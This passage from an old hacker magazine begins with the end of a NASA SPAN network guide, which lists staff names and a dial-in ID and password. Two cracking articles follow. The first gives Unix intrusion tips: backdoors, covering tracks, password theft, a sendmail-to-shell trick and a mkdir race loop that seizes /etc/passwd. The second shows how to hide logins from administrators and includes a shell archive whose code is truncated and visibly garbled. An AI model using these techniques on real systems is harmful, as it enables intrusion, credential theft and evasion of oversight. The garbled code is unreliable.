  1375. is easily obtained on VAX/VMS systems from the SYS$SYSTEM:SYSUAF.DAT file.
  1376. (Note that the SYSUAF.DAT file is (and should be) only readable by the system
  1377. manager.)  The file is called USERLIST.LIS and resides in the node's DECnet
  1378. default directory. A command procedure for creating this file is available in
  1379. NSSDCA::SPAN_NIC:USERLIST.COM.  This procedure should be executed from the
  1380. SYSTEM account on the remote node for which it is to be compiled.  Following is
  1381. an example of displaying the USERLIST.LIS file on NSSDCA from a VAX/VMS system.
  1382.  
  1383.  $ TYPE NSSDCA::USERLIST
  1384.  
  1385.       Userlist file created at : 28-SEP-1986 22:06:01.71
  1386.  
  1387.         Owner          Mail Address     Project   Default Directory
  1388.   ----------------  -----------------  ---------  -----------------
  1389.   ROBERT HOLZER     NSSDCA::HOLZER     CD8UCLGU  CDAW_C8USER:[HOLZER]
  1390.   RICHARD HOROWITZ  NSSDCA::HOROWITZ   ACQ633GU  ACQ_USER:[HOROWITZ]
  1391.   CHERYL HUANG      NSSDCA::HUANG      CD8IOWGU  CDAW_C8USER:[HUANG]
  1392.   DOMINIK P. IASCO  NSSDCA::IASCONE    PCDCDWPG  CDAW_DEV:[IASCONE]
  1393.   ISADARE BRADSKY   NSSDCA::IZZY       DVDSARPG  DAVID_DEV:[IZZY]
  1394.   WENDELL JOHNSON   NSSDCA::JOHNSON    DCSSARPG  CODD_DEV:[JOHNSON]
  1395.   DAVID JOSLIN      NSSDCA::JOSLIN     SYSNYMOP  OPERS_OPER:[JOSLIN]
  1396.   JENNIFER HYESONG  NSSDCA::JPARK      CAS130GU  CAS_USER:[JPARK]
  1397.   HSIAOFANG HU      NSSDCA::JUDY       DVDSARPG  DAVID_DEV:[JUDY]
  1398.   YOUNG-WOON KANG   NSSDCA::KANG       ADCSARGU  ADC_USER:[KANG]
  1399.   SUSAN E. KAYSER   NSSDCA::KAYSER     ACQSARGU  ACQ_USER:[KAYSER]
  1400.   DR. JOSEPH KING   NSSDCA::KING       ADM633MG  ADM_USER:[KING]
  1401.   BERNDT KLECKER    NSSDCA::KLECKER    CD8MAXGU  CDAW_C8USER:[KLECKER]
  1402.   KENNETH KLENK     NSSDCA::KLENK      PCDSARPG  ADM_USER:[KLENK]
  1403.  
  1404. Much like the user list, a node information listing is available for all nodes
  1405. in their DECnet default account.  This file is named NODEINFO.LIS.  The
  1406. following example is for the SSL node and should be taken as a template for the
  1407. generic NODEINFO.LIS file that should be on each node in SPAN.
  1408.  
  1409.  $ TYPE SSL::NODEINFO
  1410.  
  1411.  
  1412. Telenet Access To SPAN
  1413. ~~~~~~~~~~~~~~~~~~~~~~
  1414. As SPAN grows, the number of users wishing to make use of its capabilities
  1415. increases dramatically.  Now it is possible for any user with a terminal and a
  1416. 0.3 or 1.2 kbps modem to access SPAN from anywhere in the U.S. simply by making
  1417. a local telephone call.  There exists an interconnection between SPAN and the
  1418. NASA Packet Switched Service (NPSS).  The NPSS in turn has a gateway to the
  1419. public GTE Telenet network which provides the local call access facilities.
  1420. The user dials into one of Telenet's local access facilities and dials the NASA
  1421. DAF (Data Access Facility) security computer. The user is then able to access
  1422. SPAN transparently through the NSSDC or SSL machines.
  1423.  
  1424. To find the phone number of a PAD local to the area you are calling from, you
  1425. can call the Telenet customer service office, toll free, at 1-800-TELENET. They
  1426. will be able to provide you with the number of the nearest Telenet PAD.
  1427.  
  1428. The following outlines the steps that one must go through to gain access to
  1429. SPAN through Telenet.
  1430.  
  1431.      1.  First dial into the local Telenet PAD.
  1432.      2.  When the PAD answers, hit carriage return several times until the '@'
  1433.          prompt appears.
  1434.  
  1435.                             <CR><CR><CR>
  1436.  
  1437.                             @
  1438.  
  1439.      3.  Next enter the host identification address of the NASA DAF (security
  1440.          computer).  This identification was not yet available at publication
  1441.          time, but will be made available to all users requesting this type of
  1442.          access.
  1443.  
  1444.                             @ID ;32100104/NASA
  1445.  
  1446.      4.  You will then be prompted for a password (which will be made available
  1447.          with the identification above).
  1448.  
  1449.                             PASSWORD = 021075
  1450.  
  1451.                 (Note: Tthe password will not be echoed)
  1452.  
  1453.      5.  Then type <CR>.  You will be connected to the NASA DAF computer.  The
  1454.          DAF will tell you which facility and port you succeeded in reaching,
  1455.          along with a "ready" and then an asterisk prompt:
  1456.  
  1457.                 NASA PACKET NETWORK - PSCN
  1458.  
  1459.                  TROUBLE 205/544(FTS 824)-1771
  1460.  
  1461.                   PAD 311032115056
  1462.  
  1463.                 *1
  1464.  
  1465.                 ready
  1466.  
  1467.                 *
  1468.  
  1469.          All entries to the DAF must be in capital letters, and the USERID and
  1470.          PASSWORD will undoubtedly be echoed on the screen.
  1471.  
  1472.                  *LOGON
  1473.                  ENTER USERID>                   LPORTER
  1474.                  ENTER PASSWORD>                 XXXXXXX
  1475.                  ENTER SERVICE>                  SPANSSL
  1476.                  NETWORK CONNECTION IN PROGRESS
  1477.                  connected
  1478.  
  1479.          Alternatively, you may enter NSSDC for the "Service>" request.
  1480.  
  1481.      6.  You should now get the VMS "Username" prompt:
  1482.  
  1483.          Username: SPAN
  1484.  
  1485.      7.  You will then be prompted for the name of the SPAN host destination.
  1486.          For instance, if you are a Pilot Land Data System user on the NSSDC
  1487.          VAX 11/780, you would enter NSSDC and hit the carriage return in
  1488.          response to the prompt for host name.
  1489.  
  1490.          SPAN host name? NSSDC
  1491.  
  1492.      8. Finally, continue with normal logon procedure for the destination host.
  1493.  
  1494.  
  1495. The SPAN X.25 gateways have also been used extensively for internetwork
  1496. communications to developing networks in Europe and Canada.
  1497.  
  1498. The traffic from the United States to Europe was so extensive that a dedicated
  1499. link between the GSFC and ESOC routing centers.  This link became operational
  1500. in January 1987.
  1501.  
  1502.                      Configuration Of SPAN/TELENET Gateway
  1503.  
  1504.                                   ----------
  1505.                                   | dial-up|
  1506.                                   |  user  |
  1507.                                   ----------
  1508.                                        |
  1509.                            -------------------------
  1510.                            |       TELENET         |
  1511.                            -------------------------
  1512.                                    | gateway
  1513.                            -------------------------
  1514.                            |         NPSS          |
  1515.                            -------------------------
  1516.                              |                   |
  1517.                         -----------        -----------
  1518.                         |  SSL    |        |  NSSDC  |
  1519.                         | VAX 780 |        | VAX 8650|
  1520.                         -----------        -----------
  1521.                              |                   |
  1522.                            -------------------------
  1523.                            |         SPAN          |
  1524.                            -------------------------
  1525.                            |       |       |       |
  1526.                         ------   ------  ------  ------
  1527.                         |SPAN|   |SPAN|  |SPAN|  |SPAN|
  1528.                         |node|   |node|  |node|  |node|
  1529.                         ------   ------  ------  ------
  1530.  
  1531.  
  1532. SPAN/ARPANET/BITNET/Public Packet Mail Gateways
  1533. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1534. SPAN supports several gateways both to and from several major networks.  The
  1535. following gives the current syntax for forming an address to another user on
  1536. another network.  There are several similar gateways at other SPAN nodes that
  1537. are not included in this list.  Stanford is used here only as a typical
  1538. example.  If it is necessary for you to use the Stanford mail gateway on an
  1539. occasional basis, you should obtain permission from the system manager on the
  1540. STAR node (or any other non-NASA gateway node).  Currently, there is no
  1541. restriction on the NSSDCA gateway usage.
  1542.  
  1543.  
  1544. SPAN-to-ARPANET: NSSDC Gateway . . To: NSSDCA::ARPA%"arpauser@arpahost"
  1545.                  JPL Gateway . . . To: JPLLSI::"arpauser@arpahost"
  1546.                  Stanford Gateway. To: STAR::"arpauser@arpahost"
  1547.  
  1548. ARPANET-to-SPAN: NSSDC Gateway . . To: spanuser%spanhost.SPAN@128.183.10.4
  1549.                  JPL Gateway . . . To: spanuser%spanhost.SPAN@JPL-VLSI.ARPA
  1550.                  Stanford Gateway. To: spanuser%spanhost.SPAN@STAR.STANFORD.EDU
  1551.                  [Note:  128.183.10.4 is MILNET/ARPANET address for the NSSDC]
  1552.  
  1553. SPAN-to-BITNET:
  1554.     NSSDC Gateway. . .To: NSSDCA::ARPA%"bituser%bithost.BITNET@CUNY.CUNYVM.EDU"
  1555.     JPL Gateway. . . .To: JPLLSI::"bituser%bithost.BITNET@CUNY.CUNYVM.EDU"
  1556.     Stanford Gateway .To: STAR::"bituser%bithost.BITNET@CUNY.CUNYVM.EDU"
  1557.  
  1558. BITNET-to-SPAN: Stanford Gateway. . . . To: spanuser%spanhost.SPAN@SU-STAR.ARPA
  1559.  
  1560.  
  1561. The following gateways allow users on a VAX that supports a connection to a
  1562. public packet switch system (virtually anywhere in the world) to reach SPAN
  1563. nodes and vice-versa.  Note that this will transmit mail only to and from VAXs
  1564. that support DEC PSI and PSI incoming and outgoing mail.
  1565.  
  1566. SPAN-to-Public Packet VAX
  1567.         NSSDC Gateway. To: NSSDCA::PSI%dte_number::username
  1568.         SSL Gateway. . To: SSL::PSI%dte_number::username
  1569.  
  1570. Public Packet VAX-to-SPAN node
  1571.         NSSDC Gateway. To: PSI%311032107035::span_node_name::username
  1572.         SSL Gateway. . To: PSI%311032100160::span_node_name::username
  1573.  
  1574.  
  1575. It is possible for remote terminal access and mail between users on England's
  1576. Joint Academic Network (JANET) and SPAN.  JANET is a private X.25 network used
  1577. by the UK academic community and is accessible through the two SPAN public
  1578. packet switched gateways at MSFC and at the NSSDC.
  1579.  
  1580.  
  1581. List Of Acronyms
  1582. ~~~~~~~~~~~~~~~~
  1583. ARC     - Ames Research Center
  1584. ARPANET - Advanced Research Projects Agency network
  1585. BITNET  - Because It's Time Network
  1586. CDAW    - Coordinated Data Analysis Workshop
  1587. CSNET   - Computer Science Network
  1588. DDCMP   - DEC "level II" network protocol
  1589. DEC     - Digital Equipment Corporation
  1590. DECnet  - DEC networking products generic family name
  1591. DSUWG   - Data System Users Working Group
  1592. ESOC    - European Space Operations Center
  1593. ESTEC   - European Space Research and Technology Center
  1594. GSFC    - Goddard Space Flight Center
  1595. GTE     - General Telephone and Electic
  1596. HEPNET  - High Energy Physics Network
  1597. INFNET  - Instituto Nazional Fisica Nucleare Network
  1598. ISAS    - Institute of Space and Astronautical Science
  1599. ISO/OSI - International Standards Organization/Open Systems Interconnection
  1600.           (network protocol)
  1601. ISTP    - International Solar Terrestrial Physics
  1602. JANET   - Joint Academic Network (in United Kingdom)
  1603. JPL     - Jet Propulsion Laboratory
  1604. JSC     - Johnson Space Center
  1605. kbps    - Kilobit per second
  1606. LAN     - Local area network
  1607. LANL    - Los Alamos National Laboratory
  1608. MFENET  - Magnetic Fussion Energy Network
  1609. MILNET  - Defence data network (originally part of ARPANET)
  1610. MSFC    - Marshall Space Flight Center
  1611. NCAR    - National Center for Atmospheric Research
  1612. NFT     - Network File Transfer (program on RSX/IAS systems)
  1613. NIC     - Network Information Center
  1614. NPSS    - NASA Packet Switched System (using X.25 protocol)
  1615. NSSDC   - National Space Science Data Center (at GSFC)
  1616. PDS     - Planetary Data System
  1617. PSCN    - Program Support Communications Network
  1618. SESNET  - Space and Earth Science Network (at GSFC)
  1619. SPAN    - Space Physics Analysis Network
  1620. SSL     - Space Science Laboratory (at MSFC)
  1621. RVT     - Remote virtual terminal program for RSX or IAS systems
  1622. TCP/IP  - Transmission Control Protocol/Internet Protocol
  1623. Telenet - A public packed switched network owned by GTE
  1624. TEXNET  - Texas Network (Academic network)
  1625. WAN     - Wide area network
  1626. X.25    - A "level II" communication protocol for packet switched networks
  1627. _______________________________________________________________________________
  1628.  
  1629.  
  1630.  
  1631.                                 ==Phrack Inc.==
  1632.  
  1633.                      Volume Three, Issue 25, File 5 of 11
  1634.  
  1635.        <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
  1636.         <><><><>                                            <><><><>
  1637.         <><><>                Unix Cracking Tips              <><><>
  1638.         <><>                                                    <><>
  1639.         <>                     by Dark OverLord                   <>
  1640.         <><>                                                    <><>
  1641.         <><><>                  March 17, 1989                <><><>
  1642.         <><><><>                                            <><><><>
  1643.        <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
  1644.  
  1645.  
  1646. The purpose of this file is to present tips for budding Unix hackers.  The
  1647. audience this is aimed at are those that are experienced at working with basic
  1648. Unix, but not in the cracking aspects.
  1649.  
  1650. Most of the following material is based on actual experience with BSD boxes
  1651. (with some help from my friends).  Many of the bugs here may not apply to your
  1652. system; your mileage will vary.
  1653.  
  1654.  
  1655. When Cracking A System Remember --
  1656.  
  1657.      o ALWAYS cover your tracks
  1658.      o Don't get caught
  1659.      o Don't get malicious
  1660.      o Get off as soon as possible
  1661.      o Keep a bottle of "Wild Turkey" near the terminal
  1662. (IMPORTANT!)
  1663.  
  1664.  
  1665. About Logging:  Remember that many systems use paper terminals so that if a
  1666. warning message goes to the console, you can't erase it.
  1667.  
  1668. Hint:  If you know that you are going to be ringing a few bells, you may wish
  1669.        to send a bunch of bogus messages to the console so it runs out of paper
  1670.        before the important messages get there.
  1671.  
  1672.  
  1673. After you gain superuser privileges and you wish to stay root, here are
  1674. a few suggestions for installing backdoors:
  1675.  
  1676. - Disable checks for superuser in the kernel
  1677. - Install new system calls
  1678. - Patch a system binary to contain a backdoor
  1679. - Leave /dev/mem readable
  1680.  
  1681.  
  1682. An ancient method of extracting data from anything is to sort through its
  1683. trash.  The same applies to Unix and newly allocated data.
  1684. One trick is to look for old data in newly allocated data (eg: Allocate a
  1685. large amount of memory and search through it for old [useful?] data).  Given
  1686. enough time and an intelligent search algorithms, you could find quite a bit of
  1687. information including people's passwords and other private stuff like
  1688. mail, et al.
  1689.  
  1690.  
  1691. If the device "/dev/kmem" is readable, you should be able to write a quick C
  1692. program that intercepts the I/O to other terminals and catch other people's
  1693. password etc.
  1694.  
  1695. If the device "/dev/kmem" is writeable, it is possible to change your userid by
  1696. editing the user structure.
  1697.  
  1698.  
  1699. A Common Trick:  When looking to gain more system privileges, one of the first
  1700. things to investigate are other users' .rhost files since these can be used to
  1701. grant access to other accounts without the use of a password.  See the Unix
  1702. manual entry for rlogin for more information.
  1703.  
  1704.  
  1705. Another thing to look for are writeable .profile, .cshrc or .logins (to name a
  1706. few).  It these are left writeable, it is all too easy to install a Trojan
  1707. horse.
  1708.  
  1709.  
  1710. Look for readable .netrc files since these files may contain passwords to other
  1711. accounts.
  1712.  
  1713.  
  1714. If the man command is setuid, it might be possible to get a shell by typing
  1715. "!/bin/csh" from within the pager.
  1716.  
  1717.  
  1718. Some types of terminals can be "instructed" to issue commands using various
  1719. escape sequences.  This makes it possible to mail someone a "letter bomb" that
  1720. (when read) will send commands to the user's shell.
  1721.  
  1722.  
  1723. It is possible to mail commands to a system.  This is a feature of the
  1724. debugging mode of Unix's sendmail.  This trick was made fairly public through
  1725. its use by the Internet Worm.  The way it is done is by connecting to the SMTP
  1726. socket/port and turning on the debug mode.  The recipient that is mailed to is
  1727. "| sed '1,/$/d' | /bin/sh ; exit 0" and then the commands for the shell are
  1728. placed in the body of the letter/data section.
  1729.  
  1730.  
  1731. Under Unix it is trivial to forge mail.  The easiest way this is done is by
  1732. connecting to the SMTP port and pretending to be a foreign mailer program.
  1733.  
  1734.  
  1735. Some systems will crash if you issue the command "eval `\!\!`" from within the
  1736. C shell (/bin/csh).
  1737.  
  1738.  
  1739. When searching for data, do not forget to look for possible un-mounted file
  1740. systems.  [eg:  Look for disk partitions that are unaccounted for.]
  1741.  
  1742.  
  1743. Other things to try are illegal system calls and system calls with
  1744. illegal (strange?) arguments.  A good example is the fchown system call
  1745. under 4.3-Tahoe Release from Berkeley.  If you give it a negative
  1746. number for the group argument it grants permission for you to change
  1747. the ownership of any file.  Another example (on many systems) is the
  1748. "access" system call used by many, many programs.  Its problem is that
  1749. is only checks permissions on the requested file and neglects to check
  1750. the permissions of links and directories that lead to the file.  I have
  1751. seen some systems that allow any user to use the chroot system call;
  1752. this is VERY foolish since all I have to do in construct my own
  1753. sub-environment (with my own configuration files) and execute certain
  1754. commands from within it.
  1755.  
  1756.  
  1757. Yet another thing to look for are system structures stored in user accessible
  1758. memory.  These structures can be modified to suit your purposes.
  1759.  
  1760.  
  1761. Look for sloppy permission/ownership on system directories and on system
  1762. configuration files.  These can allow you to modify and/or control many aspects
  1763. of system behavior.  Here are a few files to look out for:
  1764. "/etc/rc",
  1765. "/etc/passwd", "/etc/group", "/etc/profile",
  1766. "/usr/lib/crontab" or
  1767. "/usr/spool/cron/crontabs/*".
  1768.  
  1769. Hint:  AT&T 3b1 systems are notorious for this problem.
  1770.  
  1771.  
  1772. If the system you are hacking has readable system logfiles and it logs failed
  1773. login attempts, a possible leak might be if a user had accidentally typed their
  1774. password at the login prompt.  You should scan through these logs looking to
  1775. strange and nonexistent account names and use these as the password for users
  1776. that logged in around that time (the command "last" will list the login time of
  1777. users).
  1778.  
  1779.  
  1780. Check to see if the system has source code on-line.  There is nothing more
  1781. useful then having system source code on-line for browsing.
  1782. Look for source code (normally found in the directory /usr/src) and scan it
  1783. for programming errors (or download it so you spend less time on the
  1784. system).
  1785.  
  1786.  
  1787. Look for other people's back doors.  If you can find any, they can make your
  1788. life a bit easier.
  1789.  
  1790.  
  1791. Check to see if the system has a good auditing system.  If so, run it since it
  1792. may find a few security problems for you.
  1793.  
  1794.  
  1795. Look for setuid shell scripts that may be on the system.  There is no
  1796. way way to secure a setuid shell script under the current release of
  1797. BSDish Unixes in the current market.  The command "find / -perm -6000 -ls"
  1798. will print out all setuid and setgid files on a system.  Look
  1799. through this list for setuid shell scripts.  One way in defeating a
  1800. setuid script is to make a link named "-i" to the file, then execute
  1801. the link.  Another way is to send it a signal at the right moment
  1802. during its start up.  The simplest way do this is to write a quick C program tha
  1803.    t sets a block on the signal, then sends
  1804. itself the signal, and then execs a setuid script. (Note: The signal
  1805. will not be processed because of the block, thus leaving it for the
  1806. setuid script).   Either of these bugs should give you an interactive
  1807. shell running as the userid of the setuid script.
  1808.  
  1809.  
  1810. If you are familiar with programming with assemblers/dissemblers, you can look
  1811. for bugs and/or modify existing software to suit your needs since most
  1812. installations do not strip debugging symbols from system binaries and leave the
  1813. executables readable.  There is an enormous amount of hacking information that
  1814. can be learned this way.
  1815.  
  1816.  
  1817. Under UNIX-V7 & 4.1BSD, programs that were setgid were only a security problem
  1818. because if you were able to get them to dump a core file, the core would be
  1819. owned by you and setgid to the groupid of the program that generated it.  Since
  1820. you owned this file, you could copy a shell of a command script into it and
  1821. have it run as the groupid of the file.  This will allow you access to to any
  1822. file that is owned by the group.
  1823.  
  1824.  
  1825. If the system you are hacking supports bidirectional modems, it is possible to
  1826. use them for stealing passwords.  This can be done by using tip to connect to
  1827. the modem and then waiting for a user to call.  When a user calls in, you
  1828. simply answer the phone and simulate the login process.  Once the user has
  1829. surrendered their password, you simulate line noise and hang up.
  1830.  
  1831.  
  1832. The Unix login program (the program that prompts you for the account name and
  1833. password) is tricky in the way that the error message for bad accounts and bad
  1834. passwords are the same.  This is to stop account/password guessing.  I guess it
  1835. works if your only access to a system is either a terminal line or a modem
  1836. connection.  If you have access through a LAN you can check account names with
  1837. the finger command.  This neat little Unix goodie will give you all sorts of
  1838. information about people's accounts.  If the finger utility is turned off,
  1839. there is another way through a program called ftp.  The ftp (File Transfer
  1840. Program) command can be used to confirm the existence of a user account/bad
  1841. password selection.  I have also noted that the ftp command does not do as much
  1842. logging, thus repeated bad password guesses not logged as much via ftp.
  1843. [See next section also.]
  1844.  
  1845.  
  1846. If the Unix system you wish to crack is networked via UUCP or TCP/IP, it should
  1847. be fairly simple to extract the password file from the remote system using the
  1848. ftp utility.  Once you have a copy of the password file, you can simply back
  1849. away from the system (thus reducing the chances of getting caught!).
  1850.  
  1851.  
  1852. See Phrack Inc. Issue 22, File 6 -- "Yet Another File On Hacking Unix by
  1853. >Unknown User<" for a slow but effective password grinder.
  1854.  
  1855.  
  1856. Another network based attack involves tapping in on the LAN (Local Area
  1857. Network) and listening for people's passwords since most systems transmit them
  1858. in clear text.
  1859.  
  1860.  
  1861. On systems that disable account logins after N number of bad logins, it is
  1862. sometimes useful to use the feature to lock out staff members from logging in
  1863. thus giving you [the cracker] more time to clean up after yourself and escape.
  1864.  
  1865.  
  1866. Here are a few bugs in the su (set userid) command that may come in handy:
  1867.  
  1868. The first was that the "-c" option did not check to see if the user being su'ed
  1869. to had a valid shell.  The "-c" option is used to instruct the su command to
  1870. run another command instead of a shell [eg:  "su davis -c foobar" tells su to
  1871. run foobar instead of davis's default shell].  This comes in handy with
  1872. accounts like "sync::0:1::/:/bin/sync" because you can execute any arbitrary
  1873. command [eg: su sync -c /bin/csh].
  1874.  
  1875. Another bug in the su command exists in some System V ports where if su was
  1876. unable to open the password file ("etc/passwd"), it would grant root access
  1877. (without checking the reason for the failure).  I guess the programming can
  1878. tell that something is wrong and grants access so someone can fix things.  The
  1879. security problem occurs when when su is executed with a full file descriptor
  1880. table; this will force su to fail its open request on the password file.
  1881.  
  1882.  
  1883. Some Unix system's mkdir (MaKe DIRectory) command can be subverted into aiding
  1884. you in gaining root.  This is done by exploiting a race condition that can
  1885. occur between processes.  The following command script will eventually cause
  1886. the error to occur and cause the password file to be owned by you:
  1887.  
  1888.     while : ; do
  1889.         nice -10 (mkdir a;rm -fr a) &
  1890.         (rm -fr a; ln /etc/passwd a) &
  1891.     done
  1892.  
  1893. The race condition happens when the "ln" command runs while the mkdir command
  1894. is in the middle of running.  This works because the mkdir does its job by
  1895. doing the two system calls:  mknod and then chown.  If the now inode (allocated
  1896. by mknod) is replaced with a link to the password file before the chown system
  1897. call is made, then the password file is "chown"ed instead.  To become root from
  1898. here, all you have to do is add a new entry into the password file.
  1899.  
  1900.  
  1901. The print command ("lpr" or "lp") has an option to delete a file after it is
  1902. printed.  This option will work (print & delete the file) even if you do not
  1903. own the file.
  1904.  
  1905.  
  1906. The mail command has the option to save your mail after you read to another
  1907. file.  Some versions of this command will save (append) your mail to a file
  1908. after it is read.  A bug exists where the mail program does not check to see if
  1909. you have write permission to the file you are saving the mail to, thus allowing
  1910. you to (for example) add new accounts to the password file.
  1911.  
  1912.  
  1913. A quick word on the crypt command (and vi -x since it uses the crypt command):
  1914. The algorithm used is not hard to break (it takes about twenty minutes to
  1915. decrypt a file with the right tools).  See the "Bell Systems Technical
  1916. journal," Vol. 63, 8, part 2 for more information.
  1917.  
  1918.  
  1919. If the UUCP configuration files are readable [default on many systems], you can
  1920. obtain the login names, passwords, and phone numbers to all of the mail links
  1921. to and from the system you are hacking.  With the use of the a public domain
  1922. program, "uupc", you can make the connections yourself and intercept and/or
  1923. filter all incoming mail.
  1924.  
  1925. There are so many ways to crack Unix just through UUCP that I am not going to
  1926. expand and list the many ways and their permutations.  Instead, I am going to
  1927. save them for an article to be done at some random time in the future.
  1928.  
  1929.  
  1930. If you are hacking on a system that supports sharable memory you may be able to
  1931. access these memory segments.  On Sun systems, there is a command called ipcs.
  1932. This command lists available sharable memory segments.  If this command does
  1933. not exist (nor has a equivalent command available), you may have to either
  1934. write one or use blind exploration.  Once you have identified these segments,
  1935. you can gain control to the data contained therein and/or other programs
  1936. utilizing the data contained within.
  1937.  
  1938.  
  1939. If you are caught:  Grasp the bottle of "Wild Turkey" (the one near your
  1940. terminal) and drink it.
  1941.  
  1942. ===============================================================
  1943.  
  1944.                                 ==Phrack Inc.==
  1945.  
  1946.                      Volume Three, Issue 25, File 6 of 11
  1947.  
  1948.                              HIDING OUT UNDER UNIX
  1949.  
  1950.                               By BLACK TIE AFFAIR
  1951.  
  1952.                                 March 25, 1989
  1953.  
  1954.  
  1955. Under Unix, a user can see who's currently logged into the system with commands
  1956. like 'who', 'finger' and 'w'.  All these programs gather parts or all of their
  1957. information by looking at the file /etc/utmp.
  1958.  
  1959. This file contains one record for each terminal connected to the system and
  1960. activated for logins.  The format of the record differs between the various
  1961. Unix versions, but there are common fields which exist on every popular Unix
  1962. descent:  The name of the terminal device (ut_line) and the name of the user
  1963. logged in on that line (ut_user).
  1964.  
  1965. Though the design of the Unix operating system is basically (!) consistent,
  1966. this scheme shows some problems.  The information whether a process is
  1967. considered to be a terminal session is not kept in the process itself, but in a
  1968. separate file.  Thus, it is the duty of user mode programs to keep this file up
  1969. to date, and gives an excellent point for a hacker to put his drill on.  To be
  1970. fair here, other operating systems have similar problems.  But we're talking
  1971. Unix currently.
  1972.  
  1973. There is another mechanism available under Unix, which can provide information
  1974. about terminal sessions:  The 'controlling tty'.  The first terminal device a
  1975. process opens becomes that process controlling tty.  Unix uses this information
  1976. internally to determine which processes should be signaled when the user types
  1977. one of the signal generating keys (CTRL-C, CTRL-\ etc.) on the terminal.  When
  1978. such a character is encountered by the terminal driver, all processes which
  1979. have this terminal device as controlling tty receive the signal corresponding
  1980. to that character.
  1981.  
  1982. A process is not needingly an interactive session if it has a controlling tty,
  1983. though.  Any process which opens a terminal device (which could be a network
  1984. process which uses a tty device for communication to another machine) has this
  1985. terminal as it's controlling tty.
  1986.  
  1987. As such, it is good practice to cross-check the contents of the utmp file with
  1988. all processes in the system which have a controlling tty.  Two shell scripts
  1989. which exactly do this on BSD and System V Unix systems are included at the end
  1990. of this file.  Both perform the same function:  They use who(1) to get a list
  1991. of the sessions mentioned in the utmp file, and ps(1) to get a list of all
  1992. processes currently running.  It outputs all processes which have a controlling
  1993. tty but are not visible with who(1).  A little flaw here is the fact that
  1994. getty processes waiting on a terminal for someone to log in are displayed.
  1995.  
  1996. The family of 'who'-programs just scans the utmp-file for entries which belong
  1997. to an active login session, and formats those records to be human-readable.
  1998. The decision whether an entry corresponds to an active session is different
  1999. under different Unix versions.  Those who have the old utmp file format (System
  2000. III, System 5R1, BSD) look at the ut_user field.  If the first byte is
  2001. non-null, the entry is considered to correspond to an active session.  Under
  2002. System 5 since release 2, the utmp structure has been enhanced to contain a
  2003. type field (ut_type) which tells about the type of the entry.  who(1) only
  2004. displays a record, when the ut_type field contains the value USER_PROCESS (as
  2005. defined in /usr/include/utmp.h).  Other records are ignored unless the -a
  2006. option is specified to who(1).
  2007.  
  2008. Being invisible to the who-family of programs gives some advantage to a hacker.
  2009. He can stay in the system with a degraded risk of being discovered by a system
  2010. manager who spies around.  Of course, a system with a properly protected utmp
  2011. file is not vulnerable to this kind of hide out, provided that the hacker
  2012. didn't manage to get root access.  For clearance, a little C program which
  2013. demonstrates this kind of hideout is included in the shar file at the end of
  2014. this article.  Just compile and run it with proper permissions to see how to
  2015. hide.
  2016.  
  2017. ! /bin/sh
  2018.  This is a shell archive.  Remove anything before this line, then feed it
  2019.  into a shell via "sh file" or similar.  To overwrite existing files,
  2020.  type "sh file -c".
  2021.  The tool that generated this appeared in the comp.sources.unix newsgroup;
  2022.  send mail to comp-sources-unix@uunet.uu.net if you want that tool.
  2023.  If this archive is complete, you will see the following message at the end:
  2024.                "End of shell archive."
  2025.  Contents:  check.bsd check.sysv uthide.c
  2026. PATH=/bin:/usr/bin:/usr/ucb ; export PATH
  2027. if test -f 'check.bsd' -a "$1" != "-c" ; then
  2028.   echo shar: Will not clobber existing file \"'check.bsd'\"
  2029. else
  2030. echo shar: Extracting \"'check.bsd'\" \(305 characters\)
  2031. sed "s/^X//" >'check.bsd' <<'END_OF_FILE'
  2032. X:
  2033. X
  2034. X(who ; echo "___" ; ps au) | awk '
  2035. X              if ($0 == "___")
  2036. X                       pslist = 1
  2037. X                       next
  2038. X
  2039. X               if ( pslist )
  2040. X                       if (ttys[$7] == 0)
  2041. X                               print $0
  2042. X
  2043. X                else
  2044. X                       if (substr($2, 0, 3) == "tty")
  2045. X                               id = substr($2, 4, 2)
  2046. X                               ttys[id] = 1
  2047. X                        else
  2048. X                               if ($2 == "console")
  2049. X                                       ttys["co"] = 1
  2050. X
  2051. X
  2052. X
  2053.  
  2054. END_OF_FILE
  2055. if test 306 -ne `wc -c <'check.bsd'`; then
  2056.     echo shar: \"'check.bsd'\" unpacked with wrong size!
  2057. fi
  2058.  end of 'check.bsd'
  2059. fi
  2060. if test -f 'check.sysv' -a "$1" != "-c" ; then
  2061.   echo shar: Will not clobber existing file \"'check.sysv'\"
  2062. else
  2063. echo shar: Extracting \"'check.sysv'\" \(312 characters\)
  2064. sed "s/^X//" >'check.sysv' <<'END_OF_FILE'
  2065. X:
  2066. X
  2067. X(who ; echo "___" ; ps -fe) | awk '
  2068. X              if ($0 == "___")
  2069. X                       pslist = 1
  2070. X                       next
  2071. X
  2072. X               if ( pslist )
  2073. X                       if ($6 != "?" && ttys[$6] == 0)
  2074. X                               print $0
  2075. X
  2076. X                else
  2077. X                       if (substr($2, 0, 3) == "tty")
  2078. X                               id = substr($2, 4, 2)
  2079. X                               ttys[id] = 1
  2080. X                        else
  2081. X                               if ($2 == "console")
  2082. X                                       ttys["co"] = 1
  2083. X
  2084. X
  2085.  
  2086. END_OF_FILE
  2087. if test 313 -ne `wc -c <'check.sysv'`; then
  2088.     echo shar: \"'check.sysv'\" unpacked with wrong size!
  2089. fi
  2090.  end of 'check.sysv'
  2091. fi
  2092. if test -f 'uthide.c' -a "$1" != "-c" ; then
  2093.   echo shar: Will not clobber existing file \"'uthide.c'\"
  2094. else
  2095. echo shar: Extracting \"'uthide.c'\" \(1295 characters\)
  2096. sed "s/^X//" >'uthide.c' <<'END_OF_FILE'
  2097. X/* hide.c - needs write access to /etc/utmp */
  2098. X
  2099. Xinclude <sys/types.h>
  2100. Xinclude <utmp.h>
  2101. Xinclude <fcntl.h>
  2102. X
  2103. Xdefine UTMP "/etc/utmp"
  2104. X
  2105. Xifndef INIT_PROCESS
  2106. X/* this is some system with this useless utmp format.  we assume bsd, but
  2107. X * it could well be system III or some other historic version.  but come
  2108. X * on, guys -- go the modern way ;-)
  2109. X */
  2110. Xdefine        BSD
  2111. Xendif
  2112. X
  2113. Xifdef BSD
  2114. Xdefine        strrchr rindex
  2115. Xelse
  2116. Xdefine bzero(s,n) memset(s,'\0',n)
  2117. Xendif
  2118. X
  2119. Xchar *
  2120. Xbasename(path)
  2121. X
  2122. X       char    *path;
  2123. X      char    *p, *strrchr();
  2124. X
